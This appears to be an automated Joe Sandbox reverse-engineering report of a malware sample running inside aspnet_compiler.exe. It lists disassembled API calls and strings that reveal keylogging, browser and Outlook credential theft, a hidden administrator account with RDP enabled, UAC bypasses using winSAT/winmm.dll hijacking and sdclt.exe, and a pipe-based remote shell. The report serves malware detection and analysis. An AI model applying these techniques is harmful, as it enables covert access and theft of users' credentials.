                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileFind$FirstNext
                                                                            • String ID:
                                                                            • API String ID: 1690352074-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,0055AD78,?,?,?,0040E4D4,0055AD74,0055AD78), ref: 0040D2FA
                                                                              • Part of subcall function 00410A8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D311,?,?,00000001), ref: 00410AE1
                                                                              • Part of subcall function 00410A8C: LookupAccountSidW.ADVAPI32(00000000,0040D311,?,00000104,?,00000010,?), ref: 00410B06
                                                                              • Part of subcall function 00410A8C: GetLastError.KERNEL32(?,?,00000001), ref: 00410B10
                                                                              • Part of subcall function 00410A8C: FreeSid.ADVAPI32(0040D311,?,?,00000001), ref: 00410B1E
                                                                            • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,0040E4D4,0055AD74,0055AD78), ref: 0040D31B
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
                                                                            • String ID:
                                                                            • API String ID: 188019324-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,77C30770,00000000,77C30770,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                                                              • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                                                              • Part of subcall function 0041111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                                                              • Part of subcall function 0041111B: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00411167
                                                                            • CloseHandle.KERNEL32(?,00000000,?,?,0040555F,?,?,00000000,00000000,?,?,?,00405909,?,00000000,00000000), ref: 00412F7F
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,00405909,?,00000000,00000000,?,?,?,?,?,?), ref: 00412F99
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,00405909,?,00000000,00000000), ref: 00412FBE
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00412FE3
                                                                            • lstrcatW.KERNEL32(?,\winSAT.exe), ref: 00412FF7
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0041301B
                                                                            • lstrcatW.KERNEL32(?,\winmm.dll), ref: 00413029
                                                                            • CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 00413039
                                                                            • CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 00413041
                                                                            • CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 00413056
                                                                            • CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 00413065
                                                                              • Part of subcall function 00412F0D: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,l0A,00000000,746CFE60,746CF560,?,?,0041306C), ref: 00412F2C
                                                                              • Part of subcall function 00412F0D: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,l0A,00000000,?,?,0041306C), ref: 00412F47
                                                                            • RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 00413083
                                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041308A
                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 00413094
                                                                            • IsWow64Process.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041309B
                                                                            • CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004130B6
                                                                            • CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004130CF
                                                                            • WriteFile.KERNEL32(00000000,00420408,00003000,?,00000000), ref: 004130E7
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 004130EE
                                                                            • ShellExecuteExW.SHELL32(?), ref: 00413112
                                                                            • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0041311B
                                                                            • Sleep.KERNEL32(000007D0), ref: 00413126
                                                                            • ExitProcess.KERNEL32 ref: 0041312D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CreateProcessWow64$CloseDirectory$CopyCurrentHandleOpenRedirectionSystemTokenlstrcat$ChangeDisableExecuteExitFindInformationModuleNameNotificationRevertShellSleepValueWrite
                                                                            • String ID: <$C:\Windows \System32\winSAT.exe$Virtual Machine Platform$\\?\C:\Windows \$\\?\C:\Windows \System32$\\?\C:\Windows \System32\WINMM.dll$\\?\C:\Windows \System32\winSAT.exe$\\?\C:\Windows \System32\winmmd.dll$\winSAT.exe$\winmm.dll$formal
                                                                            • API String ID: 1410773947-2038174052
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040AE1A
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
                                                                              • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                                                            • PathFileExistsW.SHLWAPI(00409EC5,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?,nss3.dll), ref: 0040AF08
                                                                            • PathFileExistsW.SHLWAPI(00409EC5,.dll,?,00409EC5,?,00000104,00000000), ref: 0040AF64
                                                                            • LoadLibraryW.KERNEL32(?,00409EC5,?,00000104,00000000), ref: 0040AFA3
                                                                            • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFAE
                                                                            • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFB9
                                                                            • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFC4
                                                                            • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFCF
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B0BC
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                                                            • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DefWindowProcA.USER32(?,?,?,?), ref: 004087E9
                                                                            • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00408806
                                                                            • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 0040883C
                                                                            • GetForegroundWindow.USER32 ref: 00408859
                                                                            • GetWindowTextW.USER32 ref: 0040886A
                                                                            • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 00408953
                                                                            • PostQuitMessage.USER32(00000000), ref: 00408AE6
                                                                            • RegisterRawInputDevices.USER32 ref: 00408B15
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                                                            • String ID: Unknow
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00409894
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 004098B1
                                                                            • lstrcpyW.KERNEL32 ref: 00409904
                                                                            • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040991A
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 0040994D
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040995E
                                                                            • lstrcpyW.KERNEL32 ref: 00409972
                                                                            • lstrcatW.KERNEL32(?,004176A4), ref: 00409980
                                                                            • lstrcatW.KERNEL32(?,?), ref: 00409994
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 004099B1
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 004099C6
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 004099E3
                                                                            Strings
                                                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098C4, 004098D4
                                                                            • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040989A
                                                                            • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040988A
                                                                            • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098E1, 004098E6, 004098F6
                                                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098A7, 004098B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                                                            • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,77C30770,00000000,77C30770,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                                                              • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                                                              • Part of subcall function 0041111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                                                              • Part of subcall function 0041111B: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00411167
                                                                            • CloseHandle.KERNEL32(?,00000000), ref: 00413159
                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00413168
                                                                            • IsWow64Process.KERNEL32(00000000), ref: 0041316F
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 004131A6
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004131D8
                                                                            • lstrcatW.KERNEL32(?,\sdclt.exe), ref: 004131EA
                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00413202
                                                                            • ShellExecuteExW.SHELL32(?), ref: 00413234
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041323E
                                                                            • Sleep.KERNEL32(000007D0), ref: 00413256
                                                                            • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 00413266
                                                                            • ExitProcess.KERNEL32 ref: 0041326D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$CloseCurrentExecuteShellToken$ChangeDeleteDirectoryExitFileFindHandleInformationModuleNameNotificationOpenSleepSystemTerminateWow64lstrcat
                                                                            • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00407FA5
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00407FF9
                                                                            • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 00408013
                                                                            • GetLocalTime.KERNEL32(?), ref: 0040801A
                                                                            • wsprintfW.USER32 ref: 0040804E
                                                                            • lstrcatW.KERNEL32(-00000010,?), ref: 00408065
                                                                            • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000,00000010), ref: 00408091
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004080A1
                                                                              • Part of subcall function 004134A2: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00415553), ref: 004134CF
                                                                              • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                                                              • Part of subcall function 004134A2: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00415553), ref: 004134F3
                                                                              • Part of subcall function 004134A2: FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000,?,?,00415553), ref: 00413500
                                                                              • Part of subcall function 00411EF1: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,746B82B0,00000000,?,?,?,?,004080C2), ref: 00411F1D
                                                                            • GetMessageA.USER32 ref: 00408114
                                                                              • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                                                            • TranslateMessage.USER32(?), ref: 004080FB
                                                                            • DispatchMessageA.USER32 ref: 00408106
                                                                            Strings
                                                                            • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00408048
                                                                            • c:\windows\system32\user32.dll, xrefs: 004080AF
                                                                            • \Microsoft Vision\, xrefs: 0040800D
                                                                            • SetWindowsHookExA, xrefs: 004080C7
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Message$CloseCreateHandlelstrcat$AllocChangeDispatchFindFolderLocalModuleNotificationPathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                                                            • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,?), ref: 004085F4
                                                                            • GetWindowTextW.USER32 ref: 00408607
                                                                            • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408670
                                                                            • lstrcpyW.KERNEL32 ref: 004086BD
                                                                            • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 004086DE
                                                                            • lstrlenW.KERNEL32(00417A60,00000008,00000000,?,?), ref: 00408707
                                                                            • WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408713
                                                                            • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000,?,?), ref: 00408737
                                                                            • lstrlenW.KERNEL32(00417A60,-00000008,00000000,?,?), ref: 0040874A
                                                                            • WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408756
                                                                            • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 00408768
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00408776
                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 00408780
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403447: lstrcatW.KERNEL32(00000000,77C30770), ref: 00403477
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$File$Write$Window$CloseCreateDispatcherExceptionForegroundFreeHandleTextUserVirtuallstrcatlstrcpy
                                                                            • String ID: {Unknown}
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InitializeCriticalSection.KERNEL32(?,?,?), ref: 0040E2A7
                                                                            • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0040E2BE
                                                                            • EnterCriticalSection.KERNEL32(0055AD18,?,?), ref: 0040E2CA
                                                                              • Part of subcall function 0040DCBF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0055AD18,?,?,0040E2F1,?,?), ref: 0040DCF1
                                                                            • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 0040E49F
                                                                            • RegSetValueExW.ADVAPI32(?,00000000,00000004,?,00000004,?,?), ref: 0040E4BA
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 0040E4C3
                                                                            • LeaveCriticalSection.KERNEL32(0055AD18,00000000,0055AD74,0055AD78,?,?), ref: 0040E4FE
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00403373: lstrlenW.KERNEL32(77C30770,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 0040337A
                                                                            • LeaveCriticalSection.KERNEL32(0055AD18,00000000,rpdp,0055AD78,00000000,rudp,0055AD74,0055AD74,0055AD78,?,?), ref: 0040E564
                                                                            • LeaveCriticalSection.KERNEL32(0055AD18,00000000,?,?), ref: 0040E594
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leavelstrlen$CloseCreateDeleteDispatcherEnterExceptionFreeInitializeOpenUserValueVirtuallstrcpy
                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0040FFA8: GetCurrentThreadId.KERNEL32 ref: 0040FFB4
                                                                              • Part of subcall function 0040FFA8: SetEvent.KERNEL32(00000000), ref: 0040FFC8
                                                                              • Part of subcall function 0040FFA8: WaitForSingleObject.KERNEL32(0042661C,00001388), ref: 0040FFD5
                                                                              • Part of subcall function 0040FFA8: TerminateThread.KERNEL32(0042661C,000000FE), ref: 0040FFE6
                                                                            • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 00410060
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0041007D
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 00410083
                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0041008C
                                                                            • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 004100A4
                                                                            • GetCurrentProcess.KERNEL32(00426610,00000000,00000000,00000002,?,00000000), ref: 004100BD
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 004100C3
                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 004100C6
                                                                            • GetCurrentProcess.KERNEL32(00426614,00000000,00000000,00000002,?,00000000), ref: 004100DB
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 004100E1
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00410137
                                                                            • CreateThread.KERNEL32 ref: 00410157
                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 004100E4
                                                                              • Part of subcall function 004101AB: CloseHandle.KERNEL32(00426618,00426608,0040FFFB,?,00000000,00402BC7,00000000,exit,00000000,start), ref: 004101B5
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
                                                                              • Part of subcall function 0040FDB0: CreateProcessW.KERNEL32 ref: 0040FE02
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                                                            • String ID:
                                                                            • API String ID: 337272696-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D440
                                                                            • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0040D459
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D466
                                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0040D475
                                                                            • GetLastError.KERNEL32 ref: 0040D47F
                                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0040D4A0
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4B1
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4B4
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4C4
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4C7
                                                                              • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                                                              • Part of subcall function 00401099: RtlFreeHeap.NTDLL(00000000), ref: 004010A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                                                            • String ID: ServicesActive
                                                                            • API String ID: 1929760286-3071072050
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32 ref: 0040DD8F
                                                                              • Part of subcall function 00411177: GetCurrentProcess.KERNEL32(?,?,00402EBF,?,00417668,?,?,00000000,?,?,?), ref: 0041117B
                                                                            • PathFileExistsW.SHLWAPI(?), ref: 0040DF39
                                                                            • PathFileExistsW.SHLWAPI(?), ref: 0040DDAD
                                                                              • Part of subcall function 0041130F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000,?,?,?,004091CE,?,?,?), ref: 00411326
                                                                              • Part of subcall function 0041130F: GetLastError.KERNEL32(?,?,?,004091CE,?,?,?), ref: 00411334
                                                                            • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E12C
                                                                              • Part of subcall function 0040D856: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0040D88A
                                                                            • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0040E01F
                                                                            • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E16C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 1717069549-2896544425
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 0040DB93
                                                                              • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                                                              • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
